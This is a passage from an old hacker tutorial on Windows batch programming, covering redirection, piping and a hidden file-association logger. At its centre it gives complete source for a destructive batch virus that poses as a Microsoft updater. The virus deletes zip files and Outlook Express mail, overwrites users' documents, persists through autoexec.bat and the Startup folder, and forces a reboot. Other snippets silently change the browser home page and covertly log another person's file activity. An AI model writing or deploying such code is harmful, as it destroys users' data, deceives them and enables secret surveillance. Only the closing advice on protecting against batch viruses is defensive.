batch file programming.txt

1000 HOWTOs for various needs [WINDOWS]

most commonly used to capture results of a command in a text file. Say you want to read the help on how to 
use the net command, typing the usual Help command is not useful as the results do not fit in one screen 
and scroll by extremely quickly. So instead we use the Output Redirection operator to capture the results of 
the command in a text file.

c:\windows>net > xyz.txt

This command will execute the net command and will store the results in the text file, xyz.txt . Whenever 
DOS comes by such a command, it checks if the specified file exists or not. If it does, then everything in the 
file is erased or lost and the results are stored in it. If no such file exists, then DOS creates a new file and 
stores the results in this new file.

Say, you want to store the results of more than one command in the same text file, and want to ensure that 
the results of no command are lost, then you make use of the Double Output Re Direction Symbol, which is 
the >> symbol.
For Example, 

c:\windows> net >> xyz.txt

The above command tells DOS to execute the net command and append the output to the xyz.txt file, if it 
exits.

DOS not only allows redirection to Files, but also allows redirection to various devices.

DEVICE NAME USED                       DEVICE

AUX                                     Auxiliary Device (COM1)
CLOCK$                                  Real Time Clock
COMn                                    Serial Port(COM1, COM2, COM3, COM4)
CON                                     Console(Keyboard, Screen)
LPTn                                    Parallel Port(LPT1, LPT2, LPT3)
NUL                                     NUL Device(means Nothing)
PRN                                     Printer

Say for example, you want to print the results of directory listings, then you can simply give the following 
command:

c:\windows>dir *.* > prn

The NUL device(nothing) is a bit difficult to understand and requires special mention. This device which is 
also known as the 'bit bucket' literally means nothing. Redirection to the NUL device practically has no usage 
but can be used to suppress the messages which DOS displays on the completion of a task. For example, 
when DOS has successfully copied a particular file, then it displays the message: '1 file(s) copied.'
Now say you want to suppress this task completion message, then you can make use of the NUL device.

c:\windows>copy file.txt > NUL

This will suppress the task completion message and not display it.

Redirecting Input

Just like we can redirect Output, we can also redirect Input. It is handled by the Input Redirection Operator, 
which is the < symbol. It is most commonly used to send the contents of a text file to DOS. The other common 
usage of this feature is the MORE command which displays a file one screen at a time unlike the TYPE 
command which on execution displays the entire file.(This becomes impossible to read as the file scrolls by 
at incredible speed.)Thus, many people send the long text file to the MORE command by using the 
command:

c:\windows>more < xyz.txt

This command sends the contents of the xyz.txt file to the MORE command which displays the contents 
page by page. Once the first page is read the MORE command displays something like the following on the 
screen:

......MORE......

You can also send key strokes to any DOS command which waits for User Input or needs User intervention to perform a task. You can also send multiple keystrokes. For example, a typical Format 
command requires 4 inputs, firstly pressing Enter to give the command, then Disk Insertion prompt, then the 
VOLUME label prompt and lastly the one to format another disk. So basically there are three User inputs-: 
ENTER, ENTER N and ENTER.(ENTER is Carriage return)So you can include this in a Batch file and give 
the format command in the following format:

c:\windows>format a: < xyz.bat

PIPING

Piping is a feature which combines both Input and Output Redirection. It uses the Pipe operator, which is the 
| symbol. This command captures the Output of one command and sends it as the Input of the other 
command. Say for example, when you give the command del *.* then you need to confirm that you mean to 
delete all files by pressing y. Instead we can simply do the same without any User Interaction by giving the 
command:

c:\windows> echo y | del *.* 

This command is pretty self explanatory, y is sent to the command del *.*
Batch File Programming can be very easy and quite useful. The only thing that one needs to be able to become a Batch File Programming nerd, is adequate knowledge of DOS commands. I suggest you surf the net or get a book on DOS commands and really lick the pages off the book, only then can you become an expert.


Making your own Syslog Daemon

We can easily combine the power of batch file programs and the customizable Windows Interface to make 
our own small but efficient System Logging Daemon.
Basically this Syslog Daemon can keep a track of the files opened(any kind of files), the time at which the 
files were opened also actually post the log of the User's activities on to the web, so that the System 
Administrator can keep a eye on things.

Simply follow the following steps to make the daemon-:

NOTE: In the following example, I am making a syslog daemon which keeps an eye on what text files were 
opened by the User. You can easily change what files you want it to keep an eye on by simply following the 
same steps.


1. ASSOCIATING THE FILES TO BE MONITORED TO THE LOGGER

Actually this step is not the first, but being the easiest, I have mentioned it earlier. The first thing to do is to 
associate the text files(*.txt) files to our batch file which contains the code to log the User's activities. You can 
of course keep an eye on other files as well, the procedure is almost similar. Anyway, we associate .txt files 
to our batch program so that each time a .txt file is opened, the batch file is also executed. To do this, we 
need to change the File Associations of .txt files.
For more information on Changing File Associations, refer to the Windows Help Files, simply type 
Associations and search. Anyway to change the associations of .txt files and to point them to our batch 
file, simply do the below:

Locate any .txt file on your system, select it(click once) and Press the SHIFT key. Keeping the SHIFT key 
pressed, right click on the .txt file to bring up the OPEN WITH... option. Clicking on the OPEN WITH... option 
will bring up OPEN WITH dialog box. Now click on the OTHER button and locate the batch file program 
which contains the logging code and click on OPEN and OK.
Now each time a .txt file is opened, the batch file is also executed, hence logging all interactions of the User 
with .txt files.

2. Creating the Log File

Now you need to create a text file, which actually will act like a log file and will log the activities of the User. 
This log file will contain the filename and the time at which the .txt file was opened. Create a new blank text 
file in the same directory as the batch file. Now change the attributes of this log file and make it hidden by 
changing it's attributes by issuing the ATTRIB command.

C:\windows>attrib xyz.txt +h

This will ensure that a lamer will not know as to where the log file is located.

3. CODING THE LOGGING BATCH FILE

The coding of the actual batch file which will log the User's activities and post it on the web is quite simple. If 
you have read this tutorial properly till now, then you would easily be able to understand it, although I still 
have inserted comments for novices.

echo %1 >> xyz.txt  /* Send the file name of the file opened to the log file, xyz.txt */
notepad %1  /* Launch Notepad so that the lamer does not know something is wrong. */

This logging file will only log the filename of the text file which was opened by the unsuspecting lamer, say 
you want to also log the time at which a particular file was opened, then you simply make use of the 'time' 
command. The only thing that one needs to keep in mind is that after giving the TIME command , we need 
to press enter too, which in turn has to entered in the batch file too.

Say you, who are the system administrator does not have physical access or have gone on a business trip, 
but have access to the net and need to keep in touch with the server log file, then you easily link the log file 
to a HTML file and easily view it on the click of a button. You could also make this part of the site password 
protected or even better form a public security watch contest where the person who spots something fishy 
wins a prize or something, anyway the linking can easily be done by creating an .htm or. html file and 
inserting the following snippet of code:

<html>
<title> Server Logs</title>
<body>
<a href="xyz.txt>Click here to read the Server Logs</a>
</body>
</html>

That was an example of the easiest HTML page one could create.

Another enhancement that one could make is to prevent the opening of a particular file. Say if you want to prevent the user from launching abc.txt then you would need to insert an IF conditional statement.

IF "%1" == "filename.extension" ECHO Error Message Here 

4. Enhancing the logging Batch file to escape the eyes of the Lamer.

To enhance the functioning of our logging daemon, we need to first know it's normal functioning.
Normally, if you have followed the above steps properly, then each time a .txt file is opened, the batch file 
is launched(in a new window, which is maximized) and which in turn launches Notepad. Once the filename 
and time have been logged, the batch file Window does not close automatically and the User has to exit 
from the Window manually. So maybe someone even remotely intelligent will suspect something fishy. We 
can configure our batch file to work minimized and to close itself after the logging process has been 
completed. To do this simply follow the following steps-:

a) Right Click on the Batch File.
b) Click on properties from the Pop up menu.
c) In the Program tab click on the Close on Exit option.
d) Under the same tab, under the RUN Input box select Minimized.
e) Click on Apply and voila the batch file is now more intelligent

This was just an example of a simple batch file program. You can easily create a more intelligent and more useful program using batch code.

MAKING YOUR OWN DEADLY BATCH FILE VIRUS: The atimaN_8 Batch File Virus

DISCLAIMER: This Virus was created by Ankit Fadia ankit@bol.net.in and is meant for educational purposes only. This Virus was coded to make people understand the basic concept of the Working of a Virus. Execute this Batch File at your own Risk. Any Damage caused by this file is not Ankit Fadia's fault. If you want any information regarding this Virus, do please feel free to contact me at: ankit@bol.net.in also visit my site at: http://www.crosswinds.net/~hackingtruths

The following is a simple but somewhat deadly (but quite lame)Batch File Virus that I created. I have named it, atimaN_8 I have used no advanced Batch or DOS commands in this virus and am sure that almost all you will have no problem understanding the code, If you still have trouble understanding the code, do mail me at ankit@bol.net.in

@ECHO OFF            
CLS
IF EXIST c:\winupdt.bat GOTO CODE
GOTO SETUP
:SETUP
@ECHO OFF
ECHO Welcome To Microsoft Windows System Updater Setup
ECHO.
copy %0 c:\winupdt.bat >> NUL
ECHO Scanning System.....Please Wait
prompt $P$SWindows2000
type %0 >> c:\autoexec.bat
type %0 >> c:\windows\dosstart.bat
ECHO DONE.
ECHO.
ECHO Installing Components....Please Wait
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
ECHO DONE.
ECHO.
ECHO You Now Need to Register with Microsoft's Partner: Fortune Galaxy to receive automatic updates.
PAUSE
ECHO Downloading Components...Please Wait
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx"
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"  del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
ECHO Setup Will Now restart Your Computer....Please Wait
ECHO Your System is not faster by almost 40%.
ECHO Thank you for using a Microsoft Partner's product.
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
c:\WINDOWS\RUNDLL user.exe,exitwindowsexec
CLS
GOTO END


:CODE
CLS 
@ECHO OFF
prompt $P$SWindows2000
IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC
type %0 >> c:\autoexec.bat
:ABC
type %0 >> c:\windows\dosstart.bat
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"  del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
GOTO :END
CLS
:END
CLS

This was an example of a pretty lame batch file virus. We can similarly create a virus which will edit the registry and create havoc. This is just a thought, I am not responsible for what you do with this.

There is simply no direct way of editing the Windows Registry through a batch file. Although there are Windows Registry Command line options(Check them out in the Advanced Windows Hacking Chapter, they are not as useful as adding keys or editing keys, can be. The best option we have is to create a .reg file and then execute it through a batch file. The most important thing to remember hear is the format of a .reg file and the fact that the first line of all .reg files should contain nothing but the string REGEDIT4, else Windows wil not be able to recognize it as a registry file. The following is a simple example of a batch file which changes the home page of the User (If Internet Explorer is installed)
to http://hackingtruths.tripod.com

@ECHO OFF
ECHO REGEDIT4 >ankit.reg
ECHO [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> ankit.reg
ECHO "Start Page"="http://hackingtruths.tripod.com" >> ankit.reg
START ankit.reg 

Creating a .reg file is not as easy as it seems. You see, for Windows to recognize a file as a Registry file and for Windows to add the contents of the .reg file to the registry, it has to be in a particular recognizable format, else an error message would be displayed. I would not want to repeat, the entire Windows Registry File format here, as the Advanced Windows Hacking Manual has a huge section, specially dedicated to the Windows Registry.

Protection from Batch File Viruses

If you double-click a batch file (.bat files) it will run automatically. This can be dangerous as batch files can contain harmful commands sometimes. Worst still, if you use the single-click option, one wrong click and it's goodbye Windows. Now most power users would like to set edit as the default action. To best way to do that is to go to Explorer's Folder Options' File View tab to change the modify the default action. However, to add insult to injury, when you arrive there, you will find that the Edit and Set Default buttons has been grayed out. This is a "feature" from Microsoft you might not appreciate.
To conquer our problem here, flare up your registry editor and go to HKEY_CLASSES_ROOT\batfile\shell\open Rename the open key to run, thus becoming HKEY_CLASSES_ROOT\batfile\shell\run. Double-click the EditFlags binary value in HKEY_CLASSES_ROOT\batfile and enter 00 00 00 00 as the new value. Now, open Explorer, click Folder Options from the View menu and select the File Types tab, scroll down to the "MS-DOS Batch File" item, highlight it and click Edit. You'll notice that the last three buttons (Edit, Remove and Set Default) are now enabled and that you can select Edit as the default action.
 
             
Ankit Fadia
ankit@bol.net.in

Get the Archive of Manuals [EVERYTHING YOU DREAMT OFF] written by Ankit Fadia 
At his mailing list.
To get the manuals in your Inbox join his mailing list by sending an email to:
programmingforhackers-subscribe@egroups.com